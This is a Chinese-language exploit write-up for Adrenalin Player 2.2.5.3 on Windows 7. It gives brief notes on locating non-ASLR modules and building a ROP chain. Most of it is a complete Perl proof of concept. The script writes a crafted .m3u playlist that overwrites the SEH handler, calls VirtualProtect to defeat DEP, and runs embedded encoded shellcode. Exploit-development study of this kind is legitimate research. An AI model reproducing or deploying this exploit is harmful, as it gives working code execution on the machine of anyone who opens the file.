VirtualProtect 3方法 -seh ret-ASLR-dep-Adrenalin Player 2.2.5.3

环境  ：  WIN7    

寻找 无ASLR+DEP 的DLL 去溢出

!pvefindaddr rop 慢慢 搜  也可以 先搜索出 !pvefindaddr noaslr 才对指定

然后查找合适的东西 EG:  cat rop.txt | grep -I "ADD ESP,4" > 1.txt

因为是覆盖 SEH handler  所以 覆盖的 ROP小配件不是连续的，首先要先跳到 我们的字符串去

在反复进行测试时要注意 软件是不是运行后就卡住了，

这是因为它打开了上一次测试的文件，这时测试的数据有误

动态寻找 VirtualProtect 函数的地址，利用偏移去寻找~~~~~~~~~~~~~~

有时候 可以直接 二进制寻找 指令

堆栈 处于 不能执行状态

还有一个问题就是

0012F004   FFFFFFFF  |hProcess = FFFFFFFF
0012F008   0012F20C  |Address = 0012F20C
0012F00C   00000300  |Size = 300 (768.)
0012F010   00000040  |NewProtect = PAGE_EXECUTE_READWRITE
0012F014   1024BB98  pOldProtect = Adrenali.1024BB98
我是 对 0012F20C 开始 设置 可执行的  但是我执行是从 0012F208 开始执行的，但还是可以执行的

0012F208    45              inc ebp
0012F209    45              inc ebp
0012F20A    45              inc ebp
0012F20B    45              inc ebp
0012F20C    45              inc ebp
0012F20D    45              inc ebp
0012F20E    45              inc ebp
0012F20F    45              inc ebp
0012F210    45              inc ebp

最后成功POC：

my $file = "1.m3u";#perl    
my $junk1="A"x24; #2176;

#esp start
my $shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylaxrJTJP8Wn0h3SK98QpOe84rqdLQDLLKXtNmSNYdUckkoGdDFKKSsVoKvSp2RsaxcEPsU5Qbsd03N21tLKPZ4pNkqKflLKQKDLLKEKLKuKLKQKtXlKJKlmwMbJ5ZTxeNrUGuJ5KO1GZXJ550LKw57LlKPLWuQhUShMLKPYGPWskmvSKOQWlKttOKDCkEJ9dOoNVf4zzdBT7xKqKzc7gsJpqV8kJQukQDddglaezDLKSia4S3IMcVLKwLQkLKQIELESKmS3dloKlUqONKqGQqWMqzVjP8eNrUI9WC9KPSphpdQq6PWS586CpPpaBNnkKtRsPPpP2syo1GKL0SKORw";

#######################################################################
my $justParam = pack('V',0x10129df6);            # PUSH ESP # POP ESI # RETN 0x10
$justParam = $justParam.pack('V',0x10135eaf);    # RETN
$justParam = $justParam."x"x16;                #top ret 0x10
$justParam = $justParam.pack('V',0x10013C35); #ADD ESP,20  RETN [Module : AdrenalinX.dll]  **

$justParam = $justParam."vvvv";
$justParam = $justParam."1111";
$justParam = $justParam."2222";
$justParam = $justParam."3333";
$justParam = $justParam."4444";
$justParam = $justParam.pack('V',0x1024bb98);#writeable
$justParam = $justParam."xxxx"x2;

#kernel32 address
my $findkernel32 = pack('V',0x1003de9f);     # PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
$findkernel32 =$findkernel32.'x'x4;
$findkernel32 =$findkernel32.pack('V',0x1005de8e);   #  XCHG EAX,EBP # RETN
$findkernel32 =$findkernel32.pack('V',0x1012014d);   #  XOR  EAX,EAX # RETN
$findkernel32 =$findkernel32.pack('V',0x101201d6);   #  POP EAX # RETN
$findkernel32 =$findkernel32.pack('V',0xFFFFF074);   # OFFSET F8C  0-f8c 
$findkernel32 =$findkernel32.pack('V',0x101111e2);   # NEG EAX # RETN
$findkernel32 =$findkernel32.pack('V',0x1013a5e4);   # ADD EAX,EBP # RETN
$findkernel32 =$findkernel32.pack('V',0x1010010f);   # POP ECX # RETN
$findkernel32 =$findkernel32.pack('V',0xFFFFFFFF);
$findkernel32 =$findkernel32.pack('V',0x1012dd87);   # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
$findkernel32 =$findkernel32.pack('V',0x1012014b);   # INC EAX # RETN
# virtualProtect Address
my $findVirtualProtect =pack('V',0x1002660b);   # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
$findVirtualProtect = $findVirtualProtect."x"x8;
$findVirtualProtect = $findVirtualProtect.pack('V',0x1012014d);# XOR EAX,EAX # RETN
$findVirtualProtect = $findVirtualProtect."x"x12;#top ret 0xc
$findVirtualProtect = $findVirtualProtect.pack('V',0x101201d6);# POP EAX # RETN
$findVirtualProtect = $findVirtualProtect.pack('V',0xFFFB337C);# OFSET 4CC84  1 subtract 2
#758FED5C    50                 push eax
#758FED5D    FF15 0C178B75      call dword ptr ds:[<&ntdll.RtlExitUserThread>]           ; ntdll.RtlExitUserThread

#758B20D8    jmp dword ptr ds:[<&API-MS-Win-Core-Memory-L1-1-0.Virtua>; KERNELBA.VirtualProtect  
$findVirtualProtect = $findVirtualProtect.pack('V',0x101111e2);# NEG EAX # RETN
$findVirtualProtect = $findVirtualProtect.pack('V',0x1002660b);# XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
$findVirtualProtect = $findVirtualProtect."x"x8;
$findVirtualProtect = $findVirtualProtect.pack('V',0x1013c584);# SUB EAX,ECX # RETN
$findVirtualProtect = $findVirtualProtect."x"x12;#top ret 0xc

$findVirtualProtect = $findVirtualProtect.pack('V',0x1006798b)x 8;# INC ESI # RETN

$findVirtualProtect = $findVirtualProtect.pack('V',0x1010eac7);# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
$findVirtualProtect = $findVirtualProtect."x"x4;

########################11111111111111111111###############################################
my $param1 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
$param1 = $param1."x"x4;

$param1 = $param1.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 

$param1 = $param1.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param1 = $param1."x"x4;
$param1 = $param1.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param1 = $param1."x"x4;

$param1 = $param1.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
$param1 = $param1."x"x4;

########################22222222222222222222###############################################
my $param2 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
$param2 = $param2."x"x4;

$param2 = $param2.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 


$param2 = $param2.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param2 = $param2."x"x4;
$param2 = $param2.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param2 = $param2."x"x4;

$param2 = $param2.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
$param2 = $param2."x"x4;

########################33333333333333333333###############################################
my $param3 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
$param3 = $param3."x"x4;

$param3 = $param3.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 

$param3 = $param3.pack('V',0x1001CD6C);  # XOR EAX,EAX # RETN 	[Module : AdrenalinX.dll]  ** 

$param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param3 = $param3."x"x4;
$param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param3 = $param3."x"x4;
$param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param3 = $param3."x"x4;

$param3 = $param3.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
$param3 = $param3."x"x4;

########################44444444444444444444###############################################
my $param4 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
$param4 = $param4."x"x4;

$param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
$param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
$param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
$param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 

$param4 = $param4.pack('V',0x1001CD6C);  # XOR EAX,EAX # RETN 	[Module : AdrenalinX.dll]  ** Null byte 

$param4 = $param4.pack('V',0x1014B571);  # ADD EAX,40 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
$param4 = $param4."x"x4;

$param4 = $param4.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
$param4 = $param4."x"x4;
########################xxxxxxxxxxxxxxxxxxxx###############################################
my $justret = pack('V',0x101263a0)."x"x4;  # XCHG EAX,ESP # RETN

print length($junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret)."
";
my $junk2 = "x"x100;

$junk2 = $junk2."x81xECx22xfexffxff";
$junk2 = $junk2.$shellcode;

$junk2 = $junk2.("E"x(2176-length($junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret. $junk2)));

my $JustHandlerToStack = pack('V',0x100D7AEC);  # ADD ESP,418 # RETN 	[Module : AdrenalinX.dll]  ** 

my $payload= $junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret.$junk2.$JustHandlerToStack;

print length($payload);  
open($FILE,">$file");      
binmode($FILE);
print $FILE $payload;      
close($FILE);